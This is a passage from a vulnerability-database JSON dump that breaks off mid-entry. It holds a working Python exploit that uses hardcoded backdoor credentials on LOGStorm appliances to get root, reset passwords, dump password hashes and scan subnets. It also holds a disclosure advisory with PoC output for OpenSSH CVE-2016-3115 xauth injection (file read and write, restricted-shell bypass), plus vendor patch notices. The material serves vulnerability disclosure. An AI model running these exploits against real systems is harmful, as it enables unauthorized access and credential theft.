%s root 10.1.1.3\\n\" % sys.argv[0])\r\n print(\"Actions: root reset sql web scan\")\r\n return\r\n \r\n action = str(sys.argv[1])\r\n host = str(sys.argv[2])\r\n\r\n if(\"scan\" not in action):\r\n try:\r\n socket.inet_aton(host)\r\n except socket.error:\r\n print(\"[-] %s doesn't look like a valid ip address\" % host)\r\n return\r\n\r\n ssh = paramiko.SSHClient()\r\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\r\n\r\n #\r\n # ssh login as root and execute 'id'\r\n #\r\n if(action == \"root\"):\r\n try:\r\n ssh.connect(host, SSH_PORT, ROOT_CREDS[0], ROOT_CREDS[1], timeout=SSH_TIMEOUT)\r\n except ssh_exception.AuthenticationException:\r\n print(\"\\n[-] Action failed, could not login with root credentials\\n\")\r\n return\r\n\r\n print(\"[+] Success!\")\r\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"id\")\r\n print(ssh_stdout.readline())\r\n\r\n return\r\n\r\n #\r\n # ssh login as htinit and reset root password to the default\r\n #\r\n elif(action == \"reset\"):\r\n print(\"[~] Resetting password on %s...\" % host)\r\n\r\n try:\r\n ssh.connect(host, SSH_PORT, HTINIT_CREDS[0], HTINIT_CREDS[1], timeout=SSH_TIMEOUT)\r\n except ssh_exception.AuthenticationException:\r\n print(\"\\n[-] Reset failed, could not login with htinit credentials\\n\")\r\n return\r\n\r\n ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command(\"\")\r\n\r\n ssh_stdin.write(\"4\" + \"\\n\")\r\n time.sleep(2)\r\n ssh_stdin.write(ROOT_CREDS[1] + \"\\n\")\r\n time.sleep(2)\r\n ssh_stdin.write(\"^C\" + \"\\n\")\r\n time.sleep(1)\r\n\r\n print(\"[+] Appliance root password should now be reset\")\r\n\r\n return\r\n\r\n #\r\n # sql login as htr and select user/hash columns from the web users table\r\n #\r\n elif(action == \"sql\"):\r\n print(\"[~] Asking %s for it's web users and their password hashes...\" % host)\r\n\r\n try:\r\n db = MySQLdb.connect(host=host, port=MYSQL_PORT, user=MYSQL_CREDS[0], passwd=MYSQL_CREDS[1], db=MYSQL_DB, connect_timeout=3)\r\n except MySQLdb.Error as 
error:\r\n print(\"\\n[-] Failed to connect to %s:\\n%s\\n\" % (host, error))\r\n return\r\n\r\n cursor = db.cursor()\r\n cursor.execute(MYSQL_CMD)\r\n\r\n data = cursor.fetchall()\r\n\r\n print(\"[+] Got creds!\\n\")\r\n\r\n for row in data:\r\n print(\"USER_ID: %s\\nMD5_PASSWORD: %s\\n\" % (row[0], row[1]))\r\n\r\n db.close()\r\n\r\n return\r\n\r\n #\r\n # http login as webserviceuser and gain presumably admin privileges\r\n #\r\n elif(action == \"web\"):\r\n print(\"[~] Attempting to login as backdoor web user at %s...\" % host)\r\n\r\n try: \r\n client = httplib.HTTPSConnection(host)\r\n except:\r\n print(\"[-] Couldn't establish SSL connection to %s\" % host)\r\n return\r\n\r\n params = urllib.urlencode({\"j_username\" : WEB_CREDS[0], \"j_password\" : WEB_CREDS[1]})\r\n headers = {\"Host\" : host, \"Content-Type\" : \"application/x-www-form-urlencoded\", \"Content-Length\" : \"57\"}\r\n\r\n client.request(\"POST\", WEB_URL, params, headers)\r\n\r\n response = client.getresponse()\r\n\r\n if(response.status == 408):\r\n print(\"[+] Success!\")\r\n else:\r\n print(\"[-] Service returned %d %s, which is actually not our criteria for success\" % (response.status, response.reason))\r\n\r\n return\r\n\r\n #\r\n # check the ssh network banner to identify appliances within range of <host>/24\r\n #\r\n elif(action == \"scan\"):\r\n count = 0\r\n print(\"[~] Scanning %s for LOGStorm appliances...\" % sys.argv[2])\r\n\r\n for x in range(1,255):\r\n banner = None\r\n\r\n #\r\n # 10.1.1.1/24 -> 10.1.1.[x]\r\n #\r\n host = str(sys.argv[2]).split('/')[0][:-1] + str(x)\r\n\r\n try:\r\n ssh.connect(host, SSH_PORT, \"user-that-doesnt-exist\", \"pass-that-doesnt-work\", timeout=2)\r\n except ssh_exception.NoValidConnectionsError:\r\n pass\r\n except socket.timeout:\r\n pass\r\n except ssh_exception.AuthenticationException as error:\r\n banner = ssh._transport.get_banner()\r\n if banner and SSH_BANNER in banner:\r\n print(\"[!] 
%s\\n\" % host)\r\n count+=1\r\n\r\n print(\"[+] Found %d appliance(s)\"% count)\r\n\r\n return\r\n\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40858/"}], "seebug": [{"lastseen": "2017-11-19T12:14:37", "description": "\u6765\u6e90\u94fe\u63a5\uff1a https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115\r\n### VuNote\r\n\r\n\tAuthor:\t\t<github.com/tintinweb>\r\n\tRef:\t\thttps://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115\r\n\tVersion: \t0.2\r\n\tDate: \t\tMar 3rd, 2016\r\n\t\r\n\tTag:\t\topenssh xauth command injection may lead to forced-command and /bin/false bypass \r\n\r\n### Overview\r\n\r\n\tName:\t\t\topenssh\r\n\tVendor:\t\t\tOpenBSD\r\n\tReferences:\t\t* http://www.openssh.com/[1]\r\n\t\r\n\tVersion:\t\t7.2p1 [2]\r\n\tLatest Version:\t7.2p1\r\n\tOther Versions:\t<= 7.2p1 (all versions; dating back ~20 years)\r\n\tPlatform(s):\tlinux\r\n\tTechnology:\t\tc\r\n\r\n\tVuln Classes:\tCWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\r\n\tOrigin:\t\t\tremote\r\n\tMin. Privs.:\tpost auth\r\n\r\n\tCVE:\t\t\tCVE-2016-3115\r\n\r\n\r\n\r\n### Description\r\n\r\nquote website [1]\r\n\r\n>OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.\r\n\r\n### Summary \r\n\r\nAn authenticated user may inject arbitrary xauth commands by sending an\r\nx11 channel request that includes a newline character in the x11 cookie. \r\nThe newline acts as a command separator to the xauth binary. This attack requires \r\nthe server to have `X11Forwarding yes` enabled. 
Disabling it mitigates this vector.\r\n\r\nBy injecting xauth commands one gains limited* read/write access to arbitrary files, \r\ninformation leakage or xauth-connect capabilities. These capabilities can be\r\nleveraged by an authenticated restricted user - e.g. one with the login shell \r\nconfigured as /bin/false or one with configured forced-commands - to bypass \r\naccount restrictions. This is generally not expected.\r\n\r\nThe injected xauth commands are performed with the effective permissions of the \r\nlogged-in user, as sshd has already dropped its privileges. \r\n\r\nQuick-Info:\r\n\r\n* requires: X11Forwarding yes\r\n* bypasses /bin/false and forced-commands\r\n * OpenSSH does not treat /bin/false like /bin/nologin (in contrast to Dropbear)\r\n* does not bypass /bin/nologin (as there is special treatment for this)\r\n\r\nCapabilities (xauth):\r\n\r\n* Xauth\r\n\t* write file: limited chars, xauthdb format\r\n\t* read file: limited, lines are cut at the first \\s\r\n\t* infoleak: environment\r\n\t* connect to other devices (may allow port probing)\r\n\r\n\r\nsee attached PoC, Patch\r\n\r\n\r\n### Details\r\n\r\n// see annotated code below\r\n\r\n * server_input_channel_req (serverloop.c)\r\n *- session_input_channel_req:2299 (session.c [2])\r\n *- session_x11_req:2181\r\n \r\n * do_exec_pty or do_exec_no_pty \r\n *- do_child\r\n *- do_rc_files (session.c:1335 [2])\r\n\r\nUpon receiving an `x11-req` type channel request, sshd parses the channel request\r\nparameters `auth_proto` and `auth_data` from the client ssh packet, where\r\n`auth_proto` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\r\nand `auth_data` contains the actual x11 auth cookie. This information is stored\r\nin a session-specific datastore. When calling `execute` on that session, sshd will\r\ncall `do_rc_files`, which tries to figure out if this is an x11 call by evaluating \r\nwhether `auth_proto` and `auth_data` (and `display`) are set. 
If that is the case AND\r\nno system-wide `/sshrc` exists on the server AND no user-specific `$HOME/.ssh/rc`\r\nis set, then `do_rc_files` will run `xauth -q -` and pass commands via `stdin`.\r\nNote that neither `auth_data` nor `auth_proto` is sanitized or validated; both contain\r\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\r\ncommand separator for the `xauth` binary, this allows a client to inject arbitrary\r\n`xauth` commands.\r\n\r\nSidenote #1: in case sshd takes the `$HOME/.ssh/rc` branch, it will pass the tainted\r\ninput as arguments to that script.\r\nSidenote #2: the client code also seems not to sanitize `auth_data` and `auth_proto`. [3]\r\n\r\nThis is an excerpt of `man xauth` [4] to outline the capabilities of this xauth\r\ncommand injection:\r\n\r\n\tSYNOPSIS\r\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\r\n\r\n\t\tadd displayname protocolname hexkey\r\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\r\n\t\t[n]extract filename displayname...\r\n\t\t[n]list [displayname...]\r\n\t\t[n]merge [filename...]\r\n\t\tremove displayname...\r\n\t\tsource filename\r\n\t\tinfo \r\n\t\texit\r\n\t\tquit\r\n\t\tversion\r\n\t\thelp\r\n\t\t?\r\n\t\t\r\nInteresting commands are:\r\n\t\r\n\tinfo\t - leaks environment information / path\r\n\t\t\t~# xauth info\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\tAuthority file: /root/.Xauthority\r\n\t\t\tFile new: yes\r\n\t\t\tFile locked: no\r\n\t\t\tNumber of entries: 0\r\n\t\t\tChanges honored: yes\r\n\t\t\tChanges made: no\r\n\t\t\tCurrent input: (argv):1\r\n\t\r\n\tsource\t - arbitrary file read (cut on first `\\s`)\r\n\t\t\t# xauth source /etc/shadow\r\n\t\t\txauth: file /root/.Xauthority does not exist\r\n\t\t\txauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\"\r\n\t\t\t\t\t\t\r\n\textract - arbitrary file write \r\n\t\t\t * limited characters\r\n\t * in xauth.db 
format\r\n\t * since it is not compressed it can be combined with `xauth add` to \r\n\t first store data in the database and then export it to an arbitrary\r\n\t location e.g. to plant a shell or do other things.\r\n\t\r\n\tgenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit\r\n\t\t\t vulnerabilities in X.org\r\n\t\r\n\t\r\n### Source\r\n\r\nInline annotations are prefixed with `//#!`\r\n\r\n```c\r\n/*\r\n * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found\r\n * first in this order).\r\n */\r\nstatic void\r\ndo_rc_files(Session *s, const char *shell)\r\n{\r\n...\r\n\t\tsnprintf(cmd, sizeof cmd, \"%s -q -\",\t\t\t\t\r\n\t\t options.xauth_location);\r\n\t\tf = popen(cmd, \"w\");\t\t\t\t\t\t\t//#! run xauth -q -\r\n\t\tif (f) {\r\n\t\t\tfprintf(f, \"remove %s\\n\",\t\t\t\t\t//#! remove <user_tainted_data> - injecting \\n auth_display injects xauth command\r\n\t\t\t s->auth_display);\r\n\t\t\tfprintf(f, \"add %s %s %s\\n\",\t\t\t\t//#! \\n injection\r\n\t\t\t s->auth_display, s->auth_proto,\r\n\t\t\t s->auth_data);\r\n\t\t\tpclose(f);\r\n\t\t} else {\r\n\t\t\tfprintf(stderr, \"Could not run %s\\n\",\r\n\t\t\t cmd);\r\n\t\t}\r\n\t}\r\n}\r\n```\r\n\r\n### Proof of Concept\r\n\r\nPrerequisites: \r\n\r\n* install python 2.7.x\r\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\r\n* run `poc.py`\r\n\r\n\r\n\t Usage: <host> <port> <username> <password or path_to_privkey>\r\n\t \r\n\t path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n\t \r\n\r\npoc:\r\n\r\n1. 
configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:\r\n\t```c\r\n\t#PUBKEY line - force commands: only allow \"whoami\"\r\n\t#cat /home/user1/.ssh/authorized_keys\r\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box\r\n\r\n\t#cat /etc/passwd\r\n\tuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n\t```\r\n\t \r\n2. run sshd with `X11Forwarding yes` (kali default config)\r\n\r\n\t```c\r\n\t#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d\r\n\t```\r\n\r\n3. `forced-commands` - connect with user1 and display env information\r\n\r\n\t```c\r\n\t#> python <host> 22 user1 .demoprivkey\r\n\t\r\n INFO:__main__:add this line to your authorized_keys file: \r\n\t#PUBKEY line - force commands: only allow \"whoami\"\r\n\t#cat /home/user/.ssh/authorized_keys\r\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\r\n\t\r\n\tINFO:__main__:connecting to: user1:<PKEY>@host:22\r\n\tINFO:__main__:connected!\r\n\tINFO:__main__:\r\n\tAvailable commands:\r\n\t .info\r\n\t .readfile <path>\r\n\t .writefile <path> <data>\r\n\t .exit .quit\r\n\t <any xauth command or type help>\r\n\t \r\n\t#> .info\r\n\tDEBUG:__main__:auth_cookie: '\\ninfo'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:Authority file: 
/home/user1/.Xauthority\r\n\tFile new: no\r\n\tFile locked: no\r\n\tNumber of entries: 1\r\n\tChanges honored: yes\r\n\tChanges made: no\r\n\tCurrent input: (stdin):3\r\n\t/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n\t...\r\n\t```\r\n\t\t\r\n4. `forced-commands` - read `/etc/passwd`\r\n\r\n\t```c\r\n\t...\r\n\t#> .readfile /etc/passwd\r\n\tDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\n\tdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\n\tbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\n\tsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n\tsync:x:4:65534:sync:/bin:/bin/sync\r\n\t...\r\n\t```\r\n\t\t\r\n5. `forced-commands` - write `/tmp/testfile`\r\n\r\n\t```c\r\n\t#> .writefile /tmp/testfile `thisisatestfile`\r\n\tDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile 127.0.0.250:65500'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tDEBUG:__main__:/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n\t\r\n\t#> ls -lsat /tmp/testfile\r\n\t4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile\r\n\t\r\n\t#> cat /tmp/testfile\r\n\t\u00fa65500hi\u00fa65500`thisisatestfile`\u00aa\r\n\t```\r\n\t\r\n6. 
`/bin/false` - connect and read `/etc/passwd`\r\n\r\n\t```c\r\n\t#> python <host> 22 user2 user2password\r\n\tINFO:__main__:connecting to: user2:user2password@host:22\r\n\tINFO:__main__:connected!\r\n\tINFO:__main__:\r\n\tAvailable commands:\r\n\t .info\r\n\t .readfile <path>\r\n\t .writefile <path> <data>\r\n\t .exit .quit\r\n\t <any xauth command or type help>\r\n\t \r\n\t#> .readfile /etc/passwd\r\n\tDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\n\tdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\n\tbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\n\tsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n\t...\r\n\tuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n\t...\r\n\t```\r\n\t\r\n7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100\r\n\r\n\t```c\r\n\t#> generate 8.8.8.8:100 .\t\r\n\t\r\n\t#> tcpdump \r\n\tIP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0\r\n\t```\r\n\t\t\r\n### Troubleshooting\r\n\r\n**Q**: `ImportError: No module named py3compat`\r\n\r\n**A**: outdated `paramiko` please upgrade with `pip install --upgrade paramiko`\r\n\r\n\r\n### Proposed Patch\r\n\r\n* Sanitize user-tainted input `s->auth_data`, `s->auth_proto`, `s->display`\r\n by replacing all non-printables by spaces. 
(I know this is kind of ugly ;))\r\n\r\n\t```c\r\n\t#> ~/openssh-7.2p1# diff -u session.c session.c.patched\r\n\t--- session.c 2016-02-17 11:32:11.616868923 -0500\r\n\t+++ session.c.patched 2016-02-17 11:33:33.681596273 -0500\r\n\t@@ -1327,6 +1327,18 @@\r\n\t return env;\r\n\t }\r\n\t\r\n\t+char *\r\n\t+sanitize_non_printable(char *s) {\r\n\t+ char *ptr = s;\r\n\t+ while (*ptr != '\\0'){\r\n\t+ if ((*ptr < 0x20)||(*s >= 0x7f )){ /* sanitizing \\n would basically be enough */\r\n\t+ *ptr = ' ';\r\n\t+ }\r\n\t+ ptr++;\r\n\t+ }\r\n\t+ return s;\r\n\t+}\r\n\t+\r\n\t /*\r\n\t * Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found\r\n\t * first in this order).\r\n\t@@ -1341,6 +1353,9 @@\r\n\t\r\n\t do_xauth =\r\n\t s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL;\r\n\t+ sanitize_non_printable(s->display);\r\n\t+ sanitize_non_printable(s->auth_proto);\r\n\t+ sanitize_non_printable(s->auth_data);\r\n\t /* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */\r\n\t if (!s->is_subsystem && options.adm_forced_command == NULL &&\r\n\t !no_user_rc && options.permit_user_rc &&\r\n\t```\r\n\r\n### Mitigation / Workaround\r\n* disable x11-forwarding: `sshd_config` set `X11Forwarding no`\r\n* disable x11-forwarding for specific user with forced-commands: `no-x11-forwarding` in `authorized_keys`\r\n\r\nNotes\r\n-----\r\n\r\nVerified, resolved and released within a few days. 
very impressive.\r\n\r\nVendor response: see advisory [5]\r\n\r\n### References\r\n\r\n\t[1] http://www.openssh.com/\r\n\t[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388\r\n\t[3]\thttps://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376\r\n\t[4] http://linux.die.net/man/1/xauth\r\n\t[5] http://www.openssh.com/txt/x11fwd.adv\r\n\t\r\n### Contact\r\n\r\n\r\n\thttps://github.com/tintinweb", "published": "2016-03-16T00:00:00", "type": "seebug", "title": "OpenSSH <=7.2p1 xauth injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115"], "modified": "2016-03-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91041", "id": "SSV:91041", "sourceData": "\n \r\nPrerequisites:\r\n\r\n* install python 2.7.x\r\n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x\r\n* make sure `poc.py`\r\n\r\n\r\n Usage: <host> <port> <username> <password or path_to_privkey>\r\n\r\n path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key\r\n\r\n\r\npoc:\r\n\r\n1. configure one user (user1) for `force-commands` and another one with `/bin/false` in `/etc/passwd`:\r\n\r\n#PUBKEY line - force commands: only allow \"whoami\"\r\n#cat /home/user1/.ssh/authorized_keys\r\ncommand=\"whoami\" ssh-rsa \r\nAAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15\r\n user1@box\r\n\r\n#cat /etc/passwd\r\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n \r\n2. run sshd with `X11Forwarding yes` (kali default config)\r\n\r\n#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d\r\n\r\n3. 
`forced-commands` - connect with user1 and display env information\r\n\r\n#> python <host> 22 user1 .demoprivkey\r\n\r\nINFO:__main__:add this line to your authorized_keys file:\r\n#PUBKEY line - force commands: only allow \"whoami\"\r\n#cat /home/user/.ssh/authorized_keys\r\ncommand=\"whoami\" ssh-rsa \r\nAAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15\r\n user@box\r\n\r\nINFO:__main__:connecting to: user1:<PKEY>@host:22\r\nINFO:__main__:connected!\r\nINFO:__main__:\r\nAvailable commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n\r\n#> .info\r\nDEBUG:__main__:auth_cookie: '\\ninfo'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:Authority file: /home/user1/.Xauthority\r\nFile new: no\r\nFile locked: no\r\nNumber of entries: 1\r\nChanges honored: yes\r\nChanges made: no\r\nCurrent input: (stdin):3\r\n/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n...\r\n \r\n4. `forced-commands` - read `/etc/passwd`\r\n\r\n...\r\n#> .readfile /etc/passwd\r\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\n...\r\n\r\n5. 
`forced-commands` - write `/tmp/testfile`\r\n\r\n#> .writefile /tmp/testfile `thisisatestfile`\r\nDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\r\nDEBUG:__main__:dummy exec returned: None\r\nDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile 127.0.0.250:65500'\r\nDEBUG:__main__:dummy exec returned: None\r\nDEBUG:__main__:/usr/bin/xauth: (stdin):2: bad \"add\" command line\r\n\r\n#> ls -lsat /tmp/testfile\r\n4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile\r\n\r\n#> cat /tmp/testfile\r\n\\FA65500hi\\FA65500`thisisatestfile`\\AA\r\n\r\n6. `/bin/false` - connect and read `/etc/passwd`\r\n\r\n#> python <host> 22 user2 user2password\r\nINFO:__main__:connecting to: user2:user2password@host:22\r\nINFO:__main__:connected!\r\nINFO:__main__:\r\nAvailable commands:\r\n .info\r\n .readfile <path>\r\n .writefile <path> <data>\r\n .exit .quit\r\n <any xauth command or type help>\r\n\r\n#> .readfile /etc/passwd\r\nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\nDEBUG:__main__:dummy exec returned: None\r\nINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n...\r\nuser2:x:1001:1002:,,,:/home/user2:/bin/false\r\n...\r\n \r\n7. `/bin/false` - initiate outbound X connection to 8.8.8.8:6100\r\n\r\n#> generate 8.8.8.8:100 . 
\r\n\r\n#> tcpdump\r\nIP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr \r\n0,nop,wscale 10], length 0\r\n \n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-91041", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:07", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "[5.3p1-114]\n- CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (#1245969)\n[5.3p1-113]\n- CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317816)", "edition": 4, "modified": "2016-03-21T00:00:00", "published": "2016-03-21T00:00:00", "id": "ELSA-2016-0466", "href": "http://linux.oracle.com/errata/ELSA-2016-0466.html", "title": "openssh security update", "type": "oraclelinux", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:14", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "[4.3p2-82.0.2]\n- CVE-2015-5600: MaxAuthTries limit bypass via duplicates in KbdInteractiveDevices (John Haxby) [orabug 22985024]\n- CVE-2016-3115: missing sanitisation of input for X11 forwarding (John Haxby) [orabug 22985024]", "edition": 4, "modified": "2016-04-03T00:00:00", "published": "2016-04-03T00:00:00", "id": "ELSA-2016-3531", "href": "http://linux.oracle.com/errata/ELSA-2016-3531.html", "title": "openssh security update", "type": "oraclelinux", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2016-3115"], "description": "[6.6.1p1-25 + 0.9.3-9]\n- CVE-2016-1908: possible fallback from untrusted to trusted X11 forwarding (#1298741)\n[6.6.1p1-24 + 0.9.3-9]\n- CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317818)", "edition": 4, "modified": 
"2016-03-21T00:00:00", "published": "2016-03-21T00:00:00", "id": "ELSA-2016-0465", "href": "http://linux.oracle.com/errata/ELSA-2016-0465.html", "title": "openssh security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:28", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2015-6564", "CVE-2015-5352", "CVE-2016-3115", "CVE-2015-6563"], "description": "[5.3p1-117]\n- CVE-2016-3115: missing sanitisation of input for X11 forwarding (#1317817)\n[5.3p1-116]\n- Restore functionallity of pam_ssh_agent_auth in FIPS mode (#1278315)\n- Initialize devices_done variable for challenge response (#1281468)\n- Update behaviour of X11 forwarding to match upstream (#1299048)\n[5.3p1-115]\n- Ammends previous release, fixing typos and behaviour changes", "edition": 4, "modified": "2016-05-12T00:00:00", "published": "2016-05-12T00:00:00", "id": "ELSA-2016-0741", "href": "http://linux.oracle.com/errata/ELSA-2016-0741.html", "title": "openssh security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:45:48", "bulletinFamily": "unix", "cvelist": ["CVE-2015-5600", "CVE-2016-3115"], "description": "OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation.\nThese packages include the core files necessary for both the OpenSSH client\nand server.\n\nIt was discovered that the OpenSSH server did not sanitize data received\nin requests to enable X11 forwarding. An authenticated client with\nrestricted SSH access could 